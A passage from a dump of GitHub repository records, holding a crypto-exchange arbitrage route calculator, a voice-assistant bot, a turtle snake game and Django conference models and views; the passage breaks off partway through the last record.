"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[6]:\n\n\nimport requests\nimport bxapi\n\n# In[7]:\n\n\nclass getBx():\n def __init__(self):\n self.data()\n def data(self):\n bx_pair = requests.get('https://bx.in.th/api/pairing/')\n bx_data_pair = bx_pair.json()\n #money = 800 ;\n money = bxapi.getBalance('THB')\n print(f\"Current Money : {money}\")\n bx_price = [0]*40\n bx_price_buy = [0]*40\n bx_price_sell = [0]*40\n bx_name_pri = [0]*40\n bx_name_sec = [0]*40\n for i in range(1,35):\n try:\n bx_price[i] = requests.get('https://bx.in.th/api/orderbook/?pairing='+str(i))\n bx_price[i] = bx_price[i].json()\n bx_price_sell[i] = float(bx_price[i]['asks'][0][0])\n bx_price_buy[i] = float(bx_price[i]['bids'][0][0])\n bx_name_pri[i] = bx_data_pair[str(i)]['primary_currency']\n bx_name_sec[i] = bx_data_pair[str(i)]['secondary_currency']\n\n\n except:\n pass\n\n THB_id = []\n bx_cur_to_thb = []\n\n for i in range(1,35):\n try:\n if(bx_data_pair[str(i)]['primary_currency']=='THB'):\n THB_id.append(i)\n bx_cur_to_thb.append(bx_data_pair[str(i)]['secondary_currency'])\n except:\n pass\n self.price = bx_price\n self.priceSell = bx_price_sell\n self.priceBuy = bx_price_buy\n self.namePri = bx_name_pri\n self.nameSec = bx_name_sec\n self.dataPair = bx_data_pair\n self.THBid = THB_id\n \n\n\n# In[20]:\n\n\nclass getBittrex():\n def __init__(self):\n self.data()\n def data(self):\n bt_pair_name = []\n bt_price_buy = []\n bt_price_sell = []\n bt_name_pri = []\n bt_name_sec = []\n url = 'https://api.bittrex.com/api/v1.1/public/getmarketsummaries'\n r = requests.get(url)\n data = r.json()['result']\n for i in range(len(data)):\n #print(data[i]['MarketName'])\n splitTemp = data[i]['MarketName'].split('-')\n bt_pair_name.append(data[i]['MarketName'])\n bt_name_pri.append(splitTemp[0])\n bt_name_sec.append(splitTemp[1])\n bt_price_buy.append(data[i]['Bid'])\n bt_price_sell.append(data[i]['Ask'])\n\n for i in range(len(bt_name_pri)):\n if(bt_name_pri[i] == 'DOGE'):\n bt_name_pri[i] = 'DOG'\n if(bt_name_sec[i] == 'DOGE'):\n bt_name_sec[i] = 'DOG'\n self.priceSell = bt_price_sell\n self.priceBuy = bt_price_buy\n self.namePri = bt_name_pri\n self.nameSec = bt_name_sec\n self.pairName = bt_pair_name\n\nclass getOkex():\n def __init__(self):\n self.data()\n def data(self):\n okex_pair_name = []\n okex_price_buy = []\n okex_price_sell = []\n okex_name_pri = []\n okex_name_sec = []\n \n url = 'https://www.okex.com/api/spot/v3/instruments/ticker'\n r = requests.get(url)\n data = r.json()\n \n for i in range(len(data)):\n splitTemp = data[i]['instrument_id'].split('-')\n okex_pair_name.append(data[i]['instrument_id'])\n okex_name_pri.append(splitTemp[1])\n okex_name_sec.append(splitTemp[0])\n okex_price_buy.append(float(data[i]['bid']))\n okex_price_sell.append(float(data[i]['ask']))\n\n for i in range(len(okex_name_pri)):\n if(okex_name_pri[i] == 'DOGE'):\n okex_name_pri[i] = 'DOG'\n if(okex_name_sec[i] == 'DOGE'):\n okex_name_sec[i] = 'DOG'\n self.priceSell = okex_price_sell\n self.priceBuy = okex_price_buy\n self.namePri = okex_name_pri\n self.nameSec = okex_name_sec\n \nclass getKucoin():\n def __init__(self):\n self.data()\n def data(self):\n kucoin_pair_name = []\n kucoin_price_buy = []\n kucoin_price_sell = []\n kucoin_name_pri = []\n kucoin_name_sec = []\n \n url = 'https://api.kucoin.com/api/v1/market/allTickers'\n r= requests.get(url)\n data = r.json()['data']['ticker']\n #print(data[25])\n \n for i in range(len(data)):\n splitTemp = data[i]['symbol'].split('-')\n 
kucoin_pair_name.append(data[i]['symbol'])\n kucoin_name_pri.append(splitTemp[1])\n kucoin_name_sec.append(splitTemp[0])\n kucoin_price_buy.append(float(data[i]['buy']))\n kucoin_price_sell.append(float(data[i]['sell']))\n self.priceSell = kucoin_price_sell\n self.priceBuy = kucoin_price_buy\n self.namePri = kucoin_name_pri\n self.nameSec = kucoin_name_sec\n self.pairName = kucoin_pair_name\n\n# In[21]:\n\n\nclass getRoute():\n def __init__(self,bx,bt):\n self.route(bx,bt)\n def route(self,bx,bt):\n temp_cur = [0]*5\n temp_tradeA = [0]*5\n temp_tradeB = [0]*5\n temp_value = [0]*5\n money = 500\n profit = []\n tradeRoute = []\n THB_id = bx.THBid\n for i in THB_id:\n value = money/bx.priceSell[i]\n value_cur = bx.dataPair[str(i)]['secondary_currency']\n if(value_cur == \"GNO\" or value_cur == \"REP\" or value_cur == 'BSV' or value_cur == 'XZC' or value_cur == 'BCH'):\n continue\n #print(\"%f %s\"%(value,value_cur))\n value = value-bx_fee[value_cur] #Send to bittrex\n temp_cur[0] = value_cur;\n temp_tradeA[0]=bx.dataPair[str(i)]['primary_currency']\n temp_tradeB[0]=bx.dataPair[str(i)]['secondary_currency']\n temp_value[0] = value\n #print('b')\n #---------------Sent to Bittrex ---------------\n for j in range(300):\n value = temp_value[0]\n if(temp_cur[0] == bt.namePri[j]):\n value = value/bt.priceSell[j] \n value_cur = bt.nameSec[j]\n temp_tradeA[1] = bt.namePri[j]\n temp_tradeB[1] = bt.nameSec[j]\n elif(temp_cur[0] == bt.nameSec[j]):\n value = value*bt.priceBuy[j]\n value_cur = bt.namePri[j]\n temp_tradeA[1] = bt.nameSec[j]\n temp_tradeB[1] = bt.namePri[j]\n else : continue\n temp_cur[1] = value_cur;\n temp_value[1] = value\n\n #print('c')\n for k in range(300):\n value = temp_value[1]\n if((bt.namePri[k] or bt.nameSec[k]) in bt_sent_cur):\n if(temp_cur[1] == bt.namePri[k]):\n value = value/bt.priceSell[k] \n value_cur = bt.nameSec[k]\n temp_tradeA[2] = bt.namePri[k]\n temp_tradeB[2] = bt.nameSec[k]\n \n elif(temp_cur[1] == bt.nameSec[k]):\n value = value*bt.priceBuy[k]\n value_cur = bt.namePri[k]\n temp_tradeA[2] = bt.nameSec[k]\n temp_tradeB[2] = bt.namePri[k]\n #print(value_cur)\n else: continue;\n if(not(value_cur in bt_sent_cur)):\n continue;\n value = value - bt_fee[value_cur]\n temp_cur[2] = value_cur;\n temp_value[2] = value\n #--------------Send back to Bx-------------\n #print('d')\n for l in range(40):\n value=temp_value[2]\n if(temp_cur[2] == bx.namePri[l]):\n value = value/bx.priceSell[l] \n value_cur = bx.nameSec[l]\n temp_tradeA[3]=bx.namePri[l]\n temp_tradeB[3]=bx.nameSec[l]\n elif(temp_cur[2] == bx.nameSec[l]):\n value = value*bx.priceBuy[l]\n value_cur = bx.namePri[l]\n temp_tradeA[3]=bx.nameSec[l]\n temp_tradeB[3]=bx.namePri[l]\n else : continue\n temp_cur[3] = value_cur;\n temp_value[3] = value\n #print('e')\n for m in THB_id:\n value = temp_value[3]\n if(temp_cur[3] == bx.nameSec[m]):\n value = value*bx.priceBuy[m]\n temp_tradeA[4]=bx.nameSec[m]\n temp_tradeB[4]=bx.namePri[m]\n value_cur=bx.namePri[m]\n temp_value[4] = value\n #print('zzz')\n #print(f'Result money {value} Profit{value-money}')\n #print(\"THB > %s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n #print(\" THB > %s/%s >|| %s/%s > %s/%s >|| %s/%s > %s/%s\"%(temp_tradeA[0],temp_tradeB[0],temp_tradeA[1],temp_tradeB[1],temp_tradeA[2],temp_tradeB[2],temp_tradeA[3],temp_tradeB[3],temp_tradeA[4],temp_tradeB[4]))\n #print(\"\")\n if(value > money):\n #print(\"Result money %d Profit %d >> %s\" %(value,value-money,value_cur))\n #print(\"%s > %s > %s > %s 
>THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n profit.append(value-money)\n tradeRoute.append([ \"%s-%s\"%(temp_tradeA[0],temp_tradeB[0]) , \"%s-%s\"%(temp_tradeA[1],temp_tradeB[1]) ,\"%s-%s\"%(temp_tradeA[2],temp_tradeB[2]) ,\"%s-%s\"%(temp_tradeA[3],temp_tradeB[3]) ,\"%s-%s\"%(temp_tradeA[4],temp_tradeB[4]) ])\n self.profit = profit\n self.tradeRoute = tradeRoute\n print(\"End Route1\")\n\nclass getRoute11():\n def __init__(self,bx,bt):\n self.route(bx,bt)\n def route(self,bx,bt):\n temp_cur = [0]*5\n temp_tradeA = [0]*5\n temp_tradeB = [0]*5\n temp_value = [0]*5\n money = 0.003\n profit = []\n tradeRoute = []\n BTC_id = []\n for i in range(1,35):\n #try:\n if(bx.namePri[i]=='BTC'):\n if(bx.nameSec[i] in ['ZET','CPT','LEO']) : continue\n BTC_id.append(i)\n #bx_cur_to_thb.append(bx_data_pair[str(i)]['secondary_currency'])\n #except:\n # pass\n print(BTC_id)\n for i in [2, 3, 4, 5, 6, 7, 8, 9, 11, 13, 14, 15, 17, 18, 20]:\n print(bx.namePri[i] + \" \" +bx.nameSec[i])\n for i in BTC_id:\n value = money/bx.priceSell[i]\n value_cur = bx.dataPair[str(i)]['secondary_currency']\n if(value_cur == \"GNO\" or value_cur == \"REP\"):\n continue\n #print(\"%f %s\"%(value,value_cur))\n value = value-bx_fee[value_cur] #Send to bittrex\n temp_cur[0] = value_cur;\n temp_tradeA[0]=bx.dataPair[str(i)]['primary_currency']\n temp_tradeB[0]=bx.dataPair[str(i)]['secondary_currency']\n temp_value[0] = value\n #print('b')\n #---------------Sent to Bittrex ---------------\n for j in range(300):\n value = temp_value[0]\n if(temp_cur[0] == bt.namePri[j]):\n value = value/bt.priceSell[j] \n value_cur = bt.nameSec[j]\n temp_tradeA[1] = bt.namePri[j]\n temp_tradeB[1] = bt.nameSec[j]\n elif(temp_cur[0] == bt.nameSec[j]):\n value = value*bt.priceBuy[j]\n value_cur = bt.namePri[j]\n temp_tradeA[1] = bt.nameSec[j]\n temp_tradeB[1] = bt.namePri[j]\n else : continue\n temp_cur[1] = value_cur;\n temp_value[1] = value\n\n #print('c')\n for k in range(300):\n value = temp_value[1]\n if((bt.namePri[k] or bt.nameSec[k]) in bt_sent_cur):\n if(temp_cur[1] == bt.namePri[k]):\n value = value/bt.priceSell[k] \n value_cur = bt.nameSec[k]\n temp_tradeA[2] = bt.namePri[k]\n temp_tradeB[2] = bt.nameSec[k]\n \n elif(temp_cur[1] == bt.nameSec[k]):\n value = value*bt.priceBuy[k]\n value_cur = bt.namePri[k]\n temp_tradeA[2] = bt.nameSec[k]\n temp_tradeB[2] = bt.namePri[k]\n #print(value_cur)\n else: continue;\n if(not(value_cur in bt_sent_cur)):\n continue;\n value = value - bt_fee[value_cur]\n temp_cur[2] = value_cur;\n temp_value[2] = value\n #--------------Send back to Bx-------------\n #print('d')\n for l in range(40):\n value=temp_value[2]\n if(temp_cur[2] == bx.namePri[l]):\n value = value/bx.priceSell[l] \n value_cur = bx.nameSec[l]\n temp_tradeA[3]=bx.namePri[l]\n temp_tradeB[3]=bx.nameSec[l]\n elif(temp_cur[2] == bx.nameSec[l]):\n value = value*bx.priceBuy[l]\n value_cur = bx.namePri[l]\n temp_tradeA[3]=bx.nameSec[l]\n temp_tradeB[3]=bx.namePri[l]\n else : continue\n temp_cur[3] = value_cur;\n temp_value[3] = value\n #print('e')\n for m in BTC_id:\n value = temp_value[3]\n if(temp_cur[3] == bx.nameSec[m]):\n value = value*bx.priceBuy[m]\n temp_tradeA[4]=bx.nameSec[m]\n temp_tradeB[4]=bx.namePri[m]\n value_cur=bx.namePri[m]\n temp_value[4] = value\n #print('zzz')\n print(f'Result money {value} Profit{value-money}')\n #print(\"THB > %s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n print(\" THB > %s/%s >|| %s/%s > %s/%s >|| %s/%s > 
%s/%s\"%(temp_tradeA[0],temp_tradeB[0],temp_tradeA[1],temp_tradeB[1],temp_tradeA[2],temp_tradeB[2],temp_tradeA[3],temp_tradeB[3],temp_tradeA[4],temp_tradeB[4]))\n #print(\"\")\n if(value > money):\n print(\"Result money %d Profit %d >> %s\" %(value,value-money,value_cur))\n print(\"%s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n profit.append(value-money)\n tradeRoute.append([ \"%s-%s\"%(temp_tradeA[0],temp_tradeB[0]) , \"%s-%s\"%(temp_tradeA[1],temp_tradeB[1]) ,\"%s-%s\"%(temp_tradeA[2],temp_tradeB[2]) ,\"%s-%s\"%(temp_tradeA[3],temp_tradeB[3]) ,\"%s-%s\"%(temp_tradeA[4],temp_tradeB[4]) ])\n self.profit = profit\n self.tradeRoute = tradeRoute\n print(\"End Route11\")\n\n'''class showRoute():\n def __init__():\n self.getIt()\n def getIt():\n bx = getBx()\n bt = getBittrex()\n Route = getRoute(bx,bt)'''\n\n\ndef getSentBt():\n sentDict = {};\n sentCur = []\n url = 'https://api.bittrex.com/api/v1.1/public/getcurrencies'\n r = requests.get(url)\n data = r.json()['result']\n \n for i in range(len(data)):\n cur = data[i]['Currency']\n fee = data[i]['TxFee']\n sentCur.append(cur)\n sentDict[cur] = fee\n return sentCur,sentDict\n\n# In[22]:\n\n\nbx_sent_cur = ['BTC','ETH','REP','BCH','BSV','XCN','DAS','DOG','EOS','EVX','FTC','GNO','HYP','LTC','NMC','OMG','PND','XPY','PPC','POW','XPM','XRP','ZEC','XZC','ZMN']\nbt_sent_cur = ['BTC','ETH','REP','BCH','BSV','DAS','DOG','DOGE','EOS','FTC','GNO','LTC','OMG','POW','XRP','ZEC','XZC']\nbt_fee = {'BTC':0.0005000,'ETH':0.0060000,'REP':0.1000000,'BCH':0.0010000,'BSV':0.00010000,'DAS':0.0500000,'DOG':2.0000000,'DOGE':2.0000000,'EOS':0.0200000,'FTC':0.2000000,'GNO':0.0200000,'LTC':0.0100000,'OMG':0.3500000,'POW':5.0000000,'XRP':1.0000000,'ZEC':0.0050000,'XZC':0.0200000}\nbx_fee = {'BTC':0.0005000,'ETH':0.0050000,'REP':0.0100000,'BCH':0.0001000,'BSV':0.00100000,'XCN':0.0100000,'DAS':0.0050000,'DOG':5.0000000,'EOS':0.0001000,'EVX':0.0100000,'FTC':0.0100000,'GNO':0.0100000,'HYP':0.0100000,'LTC':0.0050000,'NMC':0.0100000,'OMG':0.2000000,'PND':2.0000000,'XPY':0.0050000,'PPC':0.0200000,'POW':0.0100000,'XPM':0.0200000,'XRP':0.0100000,'ZEC':0.0050000,'XZC':0.0050000,'ZMN':0.0100000}\n#bt_sent_cur , bt_fee = getSentBt()\n#print(len(bt_sent_cur))\n"
}
] | 12 |
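The `getRoute` class in myFunc.py above enumerates Bx's THB pairs, simulates hops through Bittrex with per-coin withdrawal fees subtracted, and keeps any route that ends with more THB than it started with. A minimal, self-contained sketch of that round-trip profit check — every price and fee below is a made-up placeholder, not live order-book data:

```python
# Minimal sketch of the round-trip arbitrage check performed by getRoute.
# All prices and fees are hypothetical placeholders, not live API data.

money = 500.0  # starting THB, as in getRoute

bx_ask_ltc_thb = 2500.0    # THB per LTC on Bx (we buy LTC here)
bt_bid_ltc_btc = 0.0031    # BTC per LTC on Bittrex (we sell LTC here)
bx_bid_btc_thb = 850000.0  # THB per BTC back on Bx (we sell BTC here)

bx_fee = {"LTC": 0.005}    # withdrawal fee when moving LTC off Bx
bt_fee = {"BTC": 0.0005}   # withdrawal fee when moving BTC off Bittrex

value = money / bx_ask_ltc_thb   # THB -> LTC on Bx (divide by ask when buying)
value -= bx_fee["LTC"]           # pay the LTC withdrawal fee to reach Bittrex
value *= bt_bid_ltc_btc          # LTC -> BTC on Bittrex (multiply by bid when selling)
value -= bt_fee["BTC"]           # pay the BTC withdrawal fee to return to Bx
value *= bx_bid_btc_thb          # BTC -> THB on Bx

if value > money:
    print(f"Profit: {value - money:.2f} THB via THB-LTC > LTC-BTC > BTC-THB")
else:
    print(f"No profit: route loses {money - value:.2f} THB")
```

The real `getRoute` runs this same arithmetic exhaustively over every THB pair and every Bittrex market, which is why it nests four loops.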
Rabie45/python_bot
|
https://github.com/Rabie45/python_bot
|
a6afe503a31e459077d2cd4f1f40b707a17c1dd2
|
6c49457d8d1f81ea648b366140828d6edfaf6a02
|
b7bb95f0750350cd4e1db4ca90ad8d5888ab2fe0
|
refs/heads/main
| 2023-04-20T09:45:18.942581 | 2021-05-07T20:42:42 | 2021-05-07T20:42:42 | 365,345,860 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5399296879768372,
"alphanum_fraction": 0.541436493396759,
"avg_line_length": 27.028169631958008,
"blob_id": "d2dd74a6cd5dd9d1e573d727c9de739b4ac7922b",
"content_id": "6b4df54b7a322e3e5a0e80370cd0d68689a1db58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1991,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 71,
"path": "/main.py",
"repo_name": "Rabie45/python_bot",
"src_encoding": "UTF-8",
"text": "\nimport speech_recognition as sr\nimport pyttsx3\nimport pywhatkit as pk\nimport pyjokes as pj\nimport wikipedia\nimport datetime as dt\nimport youtube_test\nimport takeLine\n\nlistener = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[1].id) #female sound\nmediaObj = ''\n\n\ndef talk(text):#say the string\n engine.say(text)\n engine.runAndWait()\n\n\ndef inti():\n while True:\n cmd = takeLine.take_comand(listener, sr) # take the commend from the mic\n if cmd is None:\n print('sleeping')\n pass\n elif cmd == 'how can i help u':\n talk(cmd)\n elif 'play' in cmd:\n song = cmd.replace('play ', '')\n print(song)\n linkSong = youtube_test.takeSong(song) # get the link\n mediaObj = youtube_test.URL(linkSong) # play\n print('playing ' + song)\n talk('playing ' + song)\n elif 'joke' in cmd: # tell me a joke\n joke = pj.get_joke()\n print(joke)\n talk(joke)\n elif 'who is' in cmd:\n name = cmd.replace('who is', '')\n info = wikipedia.summary(name)\n print(info)\n talk(info)\n elif 'time' in cmd:\n time = dt.datetime.now().strftime('%I:%M %p')\n talk(' the time is ' + time)\n elif 'stop' in cmd:\n mediaObj.stop()\n elif 'pause' in cmd:\n mediaObj.pause()\n elif 'continue' in cmd:\n mediaObj.play()\n elif 'volume up' in cmd:\n a = mediaObj.audio_get_volume()\n print(a)\n youtube_test.volumeUp(mediaObj, a)\n elif 'volume down' in cmd:\n a = mediaObj.audio_get_volume()\n print(a)\n youtube_test.volumeDown(mediaObj, a)\n\n elif 'mute' in cmd:\n youtube_test.mute(mediaObj)\n # youtube_test.volume_up(mediaObj)\n else:\n print('fine')\n\n\ninti()\n"
},
{
"alpha_fraction": 0.5635294318199158,
"alphanum_fraction": 0.567058801651001,
"avg_line_length": 27.366666793823242,
"blob_id": "8132d1fbd6b9640dcc7a2ded21c306b14efb2200",
"content_id": "fca0874bed85bd788c55be7cebab545fac7a65a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 850,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 30,
"path": "/takeLine.py",
"repo_name": "Rabie45/python_bot",
"src_encoding": "UTF-8",
"text": "import pyttsx3\nimport speech_recognition as sr\nlistener = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[1].id) #female sound\ndef take_comand(listener,sr):\n try:\n with sr.Microphone() as source:\n print('hmm,,,Iam hearing u')\n voice = listener.listen(source)\n command = listener.recognize_google(voice)\n print(command)\n if command == 'April':\n command = \"how can i help u\"\n return command\n elif 'April' in command:\n command = command.replace('April ', '')\n return command\n\n else:\n print('i can hear u')\n\n\n\n except:\n print('I can hear u')\ndef talk(text):#say the string\n engine.say(text)\n engine.runAndWait()"
},
{
"alpha_fraction": 0.7697368264198303,
"alphanum_fraction": 0.7697368264198303,
"avg_line_length": 49.66666793823242,
"blob_id": "de0e44bd9fc48a8ed475e02ff65f35ed94cc1ad0",
"content_id": "2f1b0967ecc42409427e93a20241b1eff8856aa5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 3,
"path": "/README.md",
"repo_name": "Rabie45/python_bot",
"src_encoding": "UTF-8",
"text": "# python_bot\ncreate a python bot his name is \"april\"\nit is a bot to play videos from youtube gather information from wiki tell u a joke or say the time\n"
}
] | 3 |
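The `inti()` loop in main.py above routes voice commands purely by substring matching on the recognized text. A minimal sketch of the same dispatch pattern, with `input()` standing in for the microphone and placeholder handlers instead of the real pyjokes/wikipedia calls, so it runs without any of the bot's dependencies:

```python
# Minimal sketch of python_bot's substring-based command dispatch.
# input() stands in for takeLine.take_comand(); handlers are placeholders.
import datetime as dt

def handle(cmd: str) -> str:
    if not cmd.strip():
        return "sleeping"                        # nothing recognized
    if "joke" in cmd:
        return "placeholder joke"                # the bot calls pyjokes.get_joke()
    if "who is" in cmd:
        name = cmd.replace("who is", "").strip()
        return f"placeholder summary of {name}"  # the bot calls wikipedia.summary()
    if "time" in cmd:
        return "the time is " + dt.datetime.now().strftime("%I:%M %p")
    return "fine"                                # fallthrough, as in inti()

while True:
    line = input("> ").lower()
    if line in ("quit", "exit"):
        break
    print(handle(line))
```

Note that the order of the checks matters with this pattern: a command containing two keywords is handled by whichever branch is tested first.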
Mahadev555/Hungry-Snake-Game-
|
https://github.com/Mahadev555/Hungry-Snake-Game-
|
47044712bfb392d9125deef32dd123cdbd9ff40e
|
b78bb6ca65133f75daedf57a330f2312bd5359b1
|
04fe57bdc5fa7ed3dd098f5f9862303a8f980603
|
refs/heads/main
| 2023-08-15T13:36:53.136993 | 2021-09-30T15:57:34 | 2021-09-30T15:57:34 | 412,129,462 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5313700437545776,
"alphanum_fraction": 0.5742637515068054,
"avg_line_length": 18.285715103149414,
"blob_id": "56436ac9b026a83bf892a84ce556da093dd7dc63",
"content_id": "2254e04672bce48e4f8722249c972be6dd1e0615",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1562,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 77,
"path": "/snake_game.py",
"repo_name": "Mahadev555/Hungry-Snake-Game-",
"src_encoding": "UTF-8",
"text": "from turtle import *\r\nimport turtle\r\nfrom random import randrange\r\nfrom freegames import square, vector\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"snake game (mahadev)\")\r\nwn.bgcolor('black')\r\nwn.tracer(0)\r\n\r\nSnake = turtle.Turtle()\r\nSnake.color(\"black\")\r\nSnake.speed(0)\r\nSnake.penup()\r\nSnake.setpos(-140,200)\r\nSnake.write(\"HUNGRY SNAKE\", font=(\"Algerian\",30,\"bold\") )\r\nSnake.penup()\r\nSnake.hideturtle()\r\nSnake.screen.bgpic(\"s22.gif\")\r\n \r\n \r\n\r\nfood = vector(0, 0)\r\nsnake = [vector(10, 0)]\r\naim = vector(0, -10)\r\n\r\n \r\ndef change(x, y):\r\n \"Change snake direction.\"\r\n aim.x = x\r\n aim.y = y\r\n\r\ndef inside(head):\r\n \"return True if head inside boundaries.\"\r\n return -360< head.x < 345 and -290 < head.y < 290\r\n \r\n\r\ndef move():\r\n \"Move snake forward one segment.\"\r\n head = snake[-1].copy()\r\n head.move(aim)\r\n\r\n if not inside(head) or head in snake:\r\n print(\"GAME OVER\")\r\n square(head.x, head.y, 10,'red')\r\n update()\r\n return\r\n\r\n snake.append(head)\r\n\r\n if head == food:\r\n print('Snake:', len(snake))\r\n food.x = randrange(-15, 15) * 10\r\n food.y = randrange(-15, 15) * 10\r\n else:\r\n snake.pop(0)\r\n \r\n\r\n clear()\r\n\r\n for body in snake:\r\n square(body.x, body.y, 10, \"black\")\r\n\r\n square(food.x, food.y, 10, 'blue')\r\n update()\r\n ontimer(move, 150)\r\n\r\n\r\nhideturtle()\r\ntracer(False)\r\nlisten()\r\nonkey(lambda: change(10, 0), 'Right')\r\nonkey(lambda: change(-10, 0), 'Left')\r\nonkey(lambda: change(0, 10), 'Up')\r\nonkey(lambda: change(0, -10), 'Down')\r\nmove()\r\ndone()\r\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 21.5,
"blob_id": "0acc6e8fd051aa48c7e4447f4446361f6a56edfb",
"content_id": "d7ff46c98cc87128f88dc9573c73ff9daa7ebe69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Mahadev555/Hungry-Snake-Game-",
"src_encoding": "UTF-8",
"text": "# Hungry-Snake-Game-\nSnake game using python\n"
}
] | 2 |
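The core rule in snake_game.py's `move()` above is: advance the head one cell, end the game if the head leaves the board or lands on the body, and pop the tail only when no food was eaten (which is what makes the snake grow). A minimal grid-only sketch of that rule, using plain `(x, y)` tuples in place of freegames vectors and no turtle graphics:

```python
# Minimal sketch of the grow-on-food / die-on-collision rule from move().
# Plain (x, y) tuples replace freegames' vector; no turtle graphics.

def inside(head):
    "Return True if head is inside the board boundaries."
    x, y = head
    return -360 < x < 345 and -290 < y < 290

snake = [(10, 0)]   # body segments; the head is snake[-1]
aim = (0, -10)      # current direction of travel
food = (10, -30)    # hypothetical food position

for _ in range(5):
    head = (snake[-1][0] + aim[0], snake[-1][1] + aim[1])
    if not inside(head) or head in snake:
        print("GAME OVER")
        break
    snake.append(head)
    if head == food:
        print("Snake:", len(snake))  # ate food: keep the tail, so the snake grows
    else:
        snake.pop(0)                 # no food: drop the tail segment
    print(snake)
```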
CLTanuki/Interpro
|
https://github.com/CLTanuki/Interpro
|
d0c1b7c25580083ab681f4e79d82c4653f9a815b
|
9e585fe0d7c3b96f4a5e5195aa7c2b92c8930dc9
|
efe0e371dce9ea01ed24fe29e6473b177aa60318
|
refs/heads/master
| 2020-12-11T07:17:02.826125 | 2014-12-10T08:58:18 | 2014-12-10T08:58:18 | 27,551,339 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7061855792999268,
"alphanum_fraction": 0.7087628841400146,
"avg_line_length": 35.97618865966797,
"blob_id": "fce5d87e94766651457daaf2e11c967f26a9cfb7",
"content_id": "bf91569bc5eeb01816e8ca4c44f39683b55bb9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1552,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 42,
"path": "/conf/models.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.utils.translation import ugettext as _\nfrom erp.enterprise.models import CorpObject\nfrom erp.directory.models import Person\n\n\nclass Report(models.Model):\n title = models.CharField(max_length=20)\n slug = models.SlugField()\n reporter = models.ForeignKey(Person)\n file = models.FileField()\n begins = models.DateField(verbose_name=_('Begins at'))\n ends = models.DateField(verbose_name=_('Ends at'))\n section = models.ForeignKey('Section', related_name='reports')\n index = models.SmallIntegerField()\n\n\nclass Section(models.Model):\n title = models.CharField(max_length=20)\n slug = models.SlugField()\n master = models.ForeignKey(Person)\n begins = models.DateField(verbose_name=_('Begins at'))\n ends = models.DateField(verbose_name=_('Ends at'))\n conf = models.ForeignKey('Conference', related_name='schedule')\n index = models.SmallIntegerField()\n\n\nclass Conference(models.Model):\n begins = models.DateField(verbose_name=_('Begins at'))\n ends = models.DateField(verbose_name=_('Ends at'))\n place = models.ForeignKey(CorpObject, verbose_name=_('Place'))\n orgs = models.ManyToManyField(Person, verbose_name=_('Managers'))\n thesis_rules = models.TextField(verbose_name=_('Thesis Rules'))\n\n def get_absolute_url(self):\n from django.core.urlresolvers import reverse\n return reverse('prj_item', args=[str(self.slug)])\n\n @property\n def serializer(self):\n from .serializers import ConferenceSerializer\n return ConferenceSerializer"
},
{
"alpha_fraction": 0.707563042640686,
"alphanum_fraction": 0.7126050591468811,
"avg_line_length": 28.649999618530273,
"blob_id": "46915a88783d00c00f47e73d1cbcbfc5668585c7",
"content_id": "4fa121e76b8bfbd5b5ae168466b63d1adc9bdd05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 20,
"path": "/conf/views.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom erp.planning.models import Project\nfrom django.views.generic import DetailView, View, ListView, TemplateView\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass ConfIndex(TemplateView):\n\n template_name = 'conf/index.html'\n\n\nclass ConfMain(DetailView):\n model = Project\n # template_name = 'conf/index.html'\n\n def get_context_data(self, **kwargs):\n context = super(ConfMain, self).get_context_data(**kwargs)\n context['confs'] = Project.objects.filter(item_type_id=17).values()# .filter(status=1)\n return context\n\n\n"
},
{
"alpha_fraction": 0.6662068963050842,
"alphanum_fraction": 0.6689655184745789,
"avg_line_length": 33.57143020629883,
"blob_id": "cf779deff3416cc7b4de8d75d51c8771a50f409d",
"content_id": "52aa57c4304a2b752aa7d9bd0da29ee51c31f914",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 21,
"path": "/conf/urls.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
